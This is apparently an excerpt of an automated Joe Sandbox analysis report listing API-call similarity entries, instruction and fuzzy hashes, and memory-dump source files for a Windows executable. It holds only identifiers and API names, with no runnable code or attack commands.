                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                      • String ID:
                                                                      • API String ID: 4141327611-0
                                                                      • Opcode ID: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                                      • Instruction ID: b42ebabc7bd284b3c06c6b3662633b3ee30230431a07e03ee9a1de68368f9ff4
                                                                      • Opcode Fuzzy Hash: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                                      • Instruction Fuzzy Hash: E841A52298C6C246F765BF28D044379E290AF42BB4F944231DA4986B95DF3DF8418BA0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 1083639309-0
                                                                      • Opcode ID: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                                      • Instruction ID: 92304867a7d573fa733b8d16895d8735a5ca772dbbfae0666248ebe7ba19fc93
                                                                      • Opcode Fuzzy Hash: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                                      • Instruction Fuzzy Hash: C9418022B18A9285E710FF51E8841BEE360FB84BA4F944036EE8D83795DF7CE545CB90
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                                      • String ID:
                                                                      • API String ID: 3340791633-0
                                                                      • Opcode ID: 41522454ef5ffe58f3c47094a62836e99305b084494bc2ef8d406c22aeaeab5d
                                                                      • Instruction ID: 0d52dc36f10f8342af8bbc726860a4f74ee046ca717683c64db3c2b1a60344fb
                                                                      • Opcode Fuzzy Hash: 41522454ef5ffe58f3c47094a62836e99305b084494bc2ef8d406c22aeaeab5d
                                                                      • Instruction Fuzzy Hash: 1E416D21E8C54689FB64BF14D6402B9A760AB84FA5FE95132DA0DC37D1CF6CF88187A1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      • Opcode ID: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
                                                                      • Instruction ID: 8dfaf1d13789bc7c5bc274a4f409683413bfe7d54372fc27317dfdde5537d01f
                                                                      • Opcode Fuzzy Hash: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
                                                                      • Instruction Fuzzy Hash: A431F621A4C68146E730BF2195007BAABA4FB54B64F950135DA8A437D5CF3DF581C790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$CloseConnectHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 1463438336-0
                                                                      • Opcode ID: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                                      • Instruction ID: 273978968ae9e7ccd8b410d024ce2bcd3bfd9f2ae738c3ceb7bd3e4d1057c610
                                                                      • Opcode Fuzzy Hash: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                                      • Instruction Fuzzy Hash: 22318F36A0C74282EB29BF16E054779A360FB49BA4F484135DA4D47B44DF2DF0549B90
                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7C0E8A27B,?,?,?,00007FF7C0E8A236), ref: 00007FF7C0E93DB1
                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7C0E8A27B,?,?,?,00007FF7C0E8A236), ref: 00007FF7C0E93E13
                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7C0E8A27B,?,?,?,00007FF7C0E8A236), ref: 00007FF7C0E93E4D
                                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7C0E8A27B,?,?,?,00007FF7C0E8A236), ref: 00007FF7C0E93E77
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                      • String ID:
                                                                      • API String ID: 1557788787-0
                                                                      • Opcode ID: 01582a1cc1afdad6e1d5985337141992fa687edcd13d7850452916e3cfeba0bf
                                                                      • Instruction ID: 1b893734df7739e67e488cb4b38dcd5c0a3d1c056fd1a3bd57404dc4281466da
                                                                      • Opcode Fuzzy Hash: 01582a1cc1afdad6e1d5985337141992fa687edcd13d7850452916e3cfeba0bf
                                                                      • Instruction Fuzzy Hash: D7218021A5C79181EA20BF26644006AF6A5FB44FE4F9C4234DA9EA3B94DF7CF4528750
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID:
                                                                      • API String ID: 847901565-0
                                                                      • Opcode ID: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                      • Instruction ID: 23bb120a33045049c73d9628a895d8fef1953cb9965939f532eab92125c81f1f
                                                                      • Opcode Fuzzy Hash: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                      • Instruction Fuzzy Hash: 7A21BE21A08A5189EA20AFA5988433AA6A0AF84BB4F954230DE6D877D4DF7CF441C390
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                      • String ID:
                                                                      • API String ID: 2864067406-0
                                                                      • Opcode ID: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                                      • Instruction ID: 4d7bf9a2c8f84c0409255c4d9072a6deb559ee796c9ba7cbec7bff3cf011396b
                                                                      • Opcode Fuzzy Hash: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                                      • Instruction Fuzzy Hash: BD316D36A0CA4581EB24EF55E4943B9B360FB88FA8F940231DA4D83BA5CF3CE485C750
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                      • String ID: cdecl
                                                                      • API String ID: 4031866154-3896280584
                                                                      • Opcode ID: deaeff6138769fdf6d873c851be99aeb1f41605d6981fa24cc03cadfce71aac2
                                                                      • Instruction ID: 37b807117410aad528c2cfe3f58b6ccb7944a6f724d7997199f8f69a1b593485
                                                                      • Opcode Fuzzy Hash: deaeff6138769fdf6d873c851be99aeb1f41605d6981fa24cc03cadfce71aac2
                                                                      • Instruction Fuzzy Hash: ED21F32270974181EA10BF159854279B761FF88FE0B884134EB5E87390DF7DF480C344
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
                                                                      • String ID:
                                                                      • API String ID: 837644225-0
                                                                      • Opcode ID: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                      • Instruction ID: 9e170301f70a7ac3f8ade3cd8c26d870ffcc7047e3b3ca9beb161ebb9043ad33
                                                                      • Opcode Fuzzy Hash: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                      • Instruction Fuzzy Hash: C821D132A19B5186EB05EF21D4047A9B3A5FB44BA5F85423ACE0D83754EF7CE841C7A4
                                                                      APIs
                                                                        • Part of subcall function 00007FF7C0E52A54: GetWindowLongPtrW.USER32 ref: 00007FF7C0E52A71
                                                                      • GetClientRect.USER32(?,?,?,?,?,00007FF7C0E9AA36,?,?,?,?,?,?,?,?,?,00007FF7C0E527AF), ref: 00007FF7C0F022C4
                                                                      • GetCursorPos.USER32(?,?,?,?,?,00007FF7C0E9AA36,?,?,?,?,?,?,?,?,?,00007FF7C0E527AF), ref: 00007FF7C0F022CF
                                                                      • ScreenToClient.USER32 ref: 00007FF7C0F022DD
                                                                      • DefDlgProcW.USER32(?,?,?,?,?,00007FF7C0E9AA36,?,?,?,?,?,?,?,?,?,00007FF7C0E527AF), ref: 00007FF7C0F0231F
                                                                        • Part of subcall function 00007FF7C0EFE894: LoadCursorW.USER32 ref: 00007FF7C0EFE945
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ClientCursor$LoadLongProcRectScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 1626762757-0
                                                                      • Opcode ID: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
                                                                      • Instruction ID: 965516409c483e6977c77476a54011afb41d4bc2378683a9e134eaa3a9fb4338
                                                                      • Opcode Fuzzy Hash: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
                                                                      • Instruction Fuzzy Hash: DC215C32A0C64286EA24EF45E890569B360FB84F98F940131DB4D83B59CF3CF984C7A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                      • String ID:
                                                                      • API String ID: 3970641297-0
                                                                      • Opcode ID: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                                      • Instruction ID: 0f21a5d301622866b1c8390078335e2fc7215a1f42dcdadd066d20875741494d
                                                                      • Opcode Fuzzy Hash: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                                      • Instruction Fuzzy Hash: 9F214172A0DBC58AE764AF15E4447AAF7A0FB88B94F840135DA8D83B54DF7CE484CB40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _ctrlfp
                                                                      • String ID:
                                                                      • API String ID: 697997973-0
                                                                      • Opcode ID: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                                      • Instruction ID: 8e64d4b507e90fa1154a1b957548ce36f1decadbe5efddc859ea1e8a3a39f658
                                                                      • Opcode Fuzzy Hash: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                                      • Instruction Fuzzy Hash: BC11F921D4C58581D611BE3D904107BD271EF9A790FA44334FB89967A5DF2DF5408B80
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 2979156933-0
                                                                      • Opcode ID: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                      • Instruction ID: c9375aaa4d7ee567b4f40f4cc0edc8132dab738348936691e4d3ea555014a44d
                                                                      • Opcode Fuzzy Hash: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                      • Instruction Fuzzy Hash: 3E21F332A0C78186E711EF66B84416AF791BB84BE4F844235EE9D83B69CF7CE1458790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                      • String ID:
                                                                      • API String ID: 357397906-0
                                                                      • Opcode ID: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                                      • Instruction ID: 105562dce3d9c2d723cb253fa19e8820a6b97fa8f39d6e2d370af9f3cd2f50b4
                                                                      • Opcode Fuzzy Hash: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                                      • Instruction Fuzzy Hash: 8921D8B6A04741DFEB00DF74D84469C77B0F748B58B404826EA5893B18DB78E654CB50
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                      • String ID:
                                                                      • API String ID: 1352324309-0
                                                                      • Opcode ID: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                                      • Instruction ID: 729014684e3858d4945b1a62b9b11f4f505f4788ab1cba7f0cb63e7d720eb5dd
                                                                      • Opcode Fuzzy Hash: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                                      • Instruction Fuzzy Hash: 9C1146B175C54282E720AF15D48476AA3E0FB84B58F948135CA4DCB744CF7DF954CBA0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$abort
                                                                      • String ID:
                                                                      • API String ID: 1447195878-0
                                                                      • Opcode ID: 5c68b7f432a971f9c1a5a37c5612d4f4cb9c7d627adb850da760d9ecfffa7c81
                                                                      • Instruction ID: 01987591d230156e0c05e3213d5722b56aec2bc61b4cf47fed5f1044a524433d
                                                                      • Opcode Fuzzy Hash: 5c68b7f432a971f9c1a5a37c5612d4f4cb9c7d627adb850da760d9ecfffa7c81
                                                                      • Instruction Fuzzy Hash: E201CC20B8D38242FA59BF79951513C91526F84BB0FC40739D91E827E2DF2EF8408BA0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CounterPerformanceQuerySleep
                                                                      • String ID:
                                                                      • API String ID: 2875609808-0
                                                                      • Opcode ID: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                      • Instruction ID: 5990d0b22f1e5c6489a39ab6df44a49a34f6e0b744ddf37e1cc6ef0cd48e63b6
                                                                      • Opcode Fuzzy Hash: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                      • Instruction Fuzzy Hash: E701D620A0CB8652FA1A7F34A04817BF361BF94765F844335E98FA1770CF6DF4858690
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
